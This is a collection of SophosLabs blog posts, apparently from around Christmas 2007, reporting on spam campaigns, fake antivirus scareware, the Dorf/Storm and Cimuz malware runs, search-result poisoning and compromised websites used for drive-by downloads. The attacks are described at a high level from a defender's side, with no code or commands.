SophosLabs blog

Over the past year SophosLabs have noticed a trend that shows no sign in stopping. The trend is that some countries’ TLDs are being abused by spammers to host content for the English speaking world.

Earlier this year we saw Belgium’s TLD (Top Level Domain), .be, being abused because you could get 10 free .be domains. Currently, the TLD of choice for spammer is either .hk or .cn (Hong Kong and China respectively).

Today the spam has mainly been porn related, though over the past week we have seen phishing and medicine related spam.

The content of the domains is typically quite salacious.

Fortunately, SophosLabs are blocking spam from these domains automatically. Whatever else the New Year brings spammers will be attempting to bypass our protection to sell you porn/meds/etc, and we will update the protection to stop them.

Happy New Year from all in SophosLabs.

For some considerable period of time now there have been applications flying around the internet, popping up here and there (quite literally), which claim there are viruses or other serious issues on your computer which you simply must fix:

Of course, the friendly application is there to help you. You just need to register the product, paying good money, to rectify the phantom issues on your computer:

Some of the applications detect the very files they drop when installing. The plot thickens!

This intentional deception to effectively scam the public out of their hard earned cash warrants censure and makes these applications borderline malware.

So next time you see a pop-up offering to scan your computer for viruses, beware! You will most likely install undesirable software. Just close the pop-up and keep browsing, especially if you’re behind a WS1000.

While drinking my coffee this morning I was reading another blog. The story about hackers poisoning Search Engine results for queries regarding the ex-Prime Minister of Pakistan Ms Benazir Bhutto was interesting.

From my investigations it doesn’t look like the hackers were targeting Ms Bhutto but rather websites in Pakistan and India.

The script that people would download is now detected as Mal/Jessy-A. Mal/Jessy-A would attempt to download Troj/Iframe-M from the same site then Mal/WSshl-A and ultimately Mal/Basine-C.

At this time many expatriate Pakistanis or those of Pakistani origin with relatives in Pakistan will be hungry for news from the region. This malware seeding will add to their miseries. Luckily people browsing behind a WS1000 are safe.

What with it being Christmas and all, I’ve had quite a bit of time off work to waste and decided to spend it playing with a virtual dwarf in the online World of Warcraft. After choosing your race and profession in this game and thinking up a suitably formulaic and hard-to-pronounce fantasy name like Sak’t'tk’trath or Gaeaelen, your character is thrust into a land of snowy mountain peaks, dense jungle, blasted wastelands and magical forests. The game tries its best to immerse you in a world of heroism, war and adventure, and this works right up until you hit your first large city, at which point you’re likely to encounter many other characters with random letters for names shouting about how you can buy gold from their website for real-world dollars or euros.

So far, the spam in World of Warcraft seems mainly to be targetted at selling things related to the game — in-game currency, services that will play your character through to the highest levels for you and some more suspicious offerings such as programs that will, they claim, make your character immortal or able to fly. There is already plenty of malware designed to steal WoW accounts, and it’s not hard to imagine the distribution method for these Trojans includes spamming a link to them in-game.

Some of the gold-selling websites seem to be somewhat legitimate, despite the fact that they’re breaking the usage policy of the game by advertising in it. At least one of them, though, seems a little confused about the currency used in most of Europe.

Players and the game’s creators, Blizzard, aren’t too happy with the effect all this spam has on the game. The easy availability of free “trial” accounts capable of walking to the busiest areas and spamming them a few minutes after being created makes it very hard for Blizzard to deal with the problem just by banning the players that spam. What they do seem to have done, though, is implement some form of spam filters. Interestingly, this filtering seems to have had the same effect on spammers in the World of Warcraft as it has on email spammers here in the real world — instead of spamming out the actual domain name of the site they want people to visit, they continually register new domain names that redirect to the eventual site that sells their product. The game even has a “Report Spam” button for players to use when they encounter spammers.

With the growing popularity of World of Warcraft and online games in general, it will be interesting to see if we eventually see spam not just selling game-related products, but also flogging the usual tat — viagra, loans and questionable degree courses. I can’t wait to receive my share of that 20,000 gold that my new Orc friend stole from the Lordaeron treasury and needs to transfer to Kalimdor in a hurry, or to get my diploma in criminology from the University of Azeroth Online.

As my colleague in Australia wrote the Dorf campaign has been relentless thus far over the festive period.

The Dorf scam has now begun to focus on a “New Year” theme, a bit too early. Perhaps the Dorf spammer is still suffering from ACS.

The spammed messages encourage the user to visit the site that hosts the malware:

The site itself is incredibly uninteresting in terms of content:

The link points to a file called happy-2008.exe, the newest variant of the Dorf family.

What is highly unusual is that the new sample is not packed in any way. We at SophosLabs suspect that this is in response to the fact that many anti-virus vendors, including ourselves, have very good proactive detection of suspicious runtime packers. It appears as though the new campaign deliberately avoids using a packer to elude proactive detection. We have, however, updated our proactive detection of Dorf to encompass the new strain as well as Mal/Dorf-H.

By the by, whilst we are on the subject of proactive detection, last week my colleague in the UK mentioned the superfluous Pushdo campaign which tends to manifest itself exclusively on Wednesdays. Well, we have not seen the Pushdo campaign today (ie Boxing Day) but we did see the campaign yesterday, Christmas Day itself. Needless to mention, we still detect the associated malware sample as Troj/Pushdo-Gen. The Pushdo author might as well have enjoyed his Christmas pudding rather than attempt to inflict misery on the public in a most uncharitable fashion.

The Dorf spam campaign shows no signs of abating during the festive season.

This morning, SophosLabs analysts continue to battle against the little Dorfs (excuse the bad pun). The latest incarnations being spammed around the world are being detected as W32/Dorf-AK.

Malware authors have shown that when it comes to malware, the festive season is the perfect time to release new malware. They hope to capitalise on this opportunity because presumably, everyone is busy with Christmas shopping, partying and having a good time to notice or bothering to update their antivirus signatures. This non-action is particularly dangerous for end users because malware authors sometimes specifically target public holidays when the user’s guard is low.

This has all been seen before. For example, in 2004, the W32/Zafi-D worm precisely targetted the Christmas season to spread itself and even a year after its release, W32/Zafi-D continues to head the malware list for another year, topping the charts in the Top 10 Malware List for Sophos in 2005.

The presence of W32/Dorf-AK has shown that in the area of security, malware never takes a holiday. And for the infected user, this certainly brings no Christmas joy.

This year’s Christmas menu had it all: an assortment of ‘enlargement’ medications, copious amounts of supposedly free goodies (just need to take a survey or three and wait … an infinity), some very generous (and pre-approved) credit allowances, various Phish, the odd Trojan and I got it all without having to ask!

The only problem was this year’s menu was the same as last year’s. In fact, it was the same as yesterday’s, last week’s, last month’s and so on apart from maybe a little Christmas theme.

Those seeking to make a malware nuisance or money from the usual spam and scams do not take time out during any festive period around the world. So, we do not either.

To all those currently eating Christmas lunch at their desk, have a merry day!

Today spamtraps monitored by SophosLabs received samples of a malware campaign spammed out using the combination of the holiday season, and the promise of a “Personal Holiday Strip Show” in an attempt to infect computers. The format of the messages were very similar to previous malware campaigns we’ve detected over the past 8-10 months:

Many varying subject lines, generic enough to entice recipients to view the message.

The message body contained thousands of variations, with a greeting and single paragraph, all attempting to direct the user to the same specific website.

The website itself contained images of scantily clad women with a title of “Mrs. Claus Gone Wild”. The images and “Download for free now!” button both linked to an executable detected as W32/Dorf-AE

This is just yet another example of Malware writers/Spammers exploiting current world news or holidays, in an attempt to grow their “Botnets”.

Or perhaps the more festive title “Jingle All the Way ( …to a Cimuz infection)” ?

Overnight SophosLabs identified a malicious eCard spam campaign that was spoofing the legitimate AmericanGreetings.com service. The spam messages used in the campaign enticed recipients into clicking on the embedded link to view their card.

Anyone who clicked on the link would not see their eCard, but instead a message informing them that an additional ActiveX control is required to view it.

Within the source of this page is the culprit - a malicious embedded object pointing a installation package hosted on the malicious domain.

If the ActiveX control installation is authorised, the CAB package is retrieved and the file update.exe is extracted and executed (detection added as Troj/Cimuz-CS). This file proceeds to infect the victim with Cimuz.

• flashupdate.exe is written to the temporary folder and executed
• an attempt is made to connect to remote servers and download additional files
• at the time of writing, one of these files was available, and contained instructions of an additional URL to download from

Thankfully, the flashupdate.exe file is pro-actively detected as Mal/Cimuz-D:

The Cimuz family of Trojans is no stranger to this blog [1,2,3], but in recent months it has been pretty quiet. Clearly the group behind this latest attack are in need of a little financial top-up over the Christmas period. Don’t help them, follow the usual rules, especially over Christmas and New Year, when social engineering tricks may work that little too easily.

By now, most users are broadly familiar with the concept of compromised machines; machines that have been pwned, under some form of remote command. The familiarity even extends to appreciating some of the uses to which compromised machines can be put. Perhaps the publicity that families such as Dorf (aka Storm) have generated helps people to understand the dangers of having a machine compromised.

I am in no way convinced the same is true for peoples’ understanding of compromised web sites. Despite significant press attention throughout 2007, and numerous articles and technical papers published by security vendors, I am still left with the feeling that site owners/administrators/developers do not truly grasp the consequences of a compromised web server.

Where sites used to be compromised to display the hacker’s tag, they are now compromised in a more sinister, functional way. The use of compromised sites by hackers has grown apace over the past 12-18 months. Most of the sites involved are compromised to link to other remote servers. This creates a ‘malware delivery mechanism’, something of a cascade effect involving many sites in some cases. Of course, the victim is unaware of this - when they browse the compromised page the chain of requests to other malicious content happens silently and in the blink of an eye (something commonly referred to as a drive-by download).

The use of compromised sites extends beyond malware however. It is important to remember that once compromised, the site can be used to host whatever content the hacker wants. The situation is highly dynamic as well - by directing compromised sites to other sites they own, hackers are able to control the flow of web traffic to a final destination of their choice.

To help illustrate these points, I thought I would give a couple of examples I have seen this week.

Firstly, a phishing attack. We frequently see phishing attacks where the phish site (spoofed version of the site of the targeted institution) is hosted on a compromised site. Earlier on today, amongst the phishing attacks we identified, I noticed two (targeting the National Bank of Kuwait, and the Abbey National).

The second example highlights the multiple uses a compromised site is often put to. A couple of days ago, we identified a routine meds campaign where the spam message contained a link to a page on various sites.

The page in question simply redirected to another site displaying the usual shop window for little blue pills and the like. However, closer inspection of the site used in the spam message showed that many of them were compromised sites - the spam message simply pointed to a redirect page that had been uploaded there. Of these compromised sites, several where not new to SophosLabs - we had seen them being used in various other web attacks. One such attack is illustrated in the flowchart below. The green arrows coming in from the top represent the links from these compromised sites.

The web page highlighted in yellow in this diagram is one under the hackers direct control, enabling them to direct the flow of traffic. Such control is of value - other hackers may pay money for the traffic to be directed towards their attacks, in order to infect victims with their malware.

In short, compromised web sites provide a mechanism for hackers to direct a huge amount of traffic into ‘paths’ or ‘flows’ of their choice. They also provide a convenient repository to store malicious or illegal content. We have seen a sharp growth in malicious web activity in 2007. The relatively ’soft’ nature of the target (poorly secured sites, servers, vulnerable applications etc) makes it very enticing for the bad guys. Let’s hope that 2008 will be the year in which the many facets of web security are taken more seriously.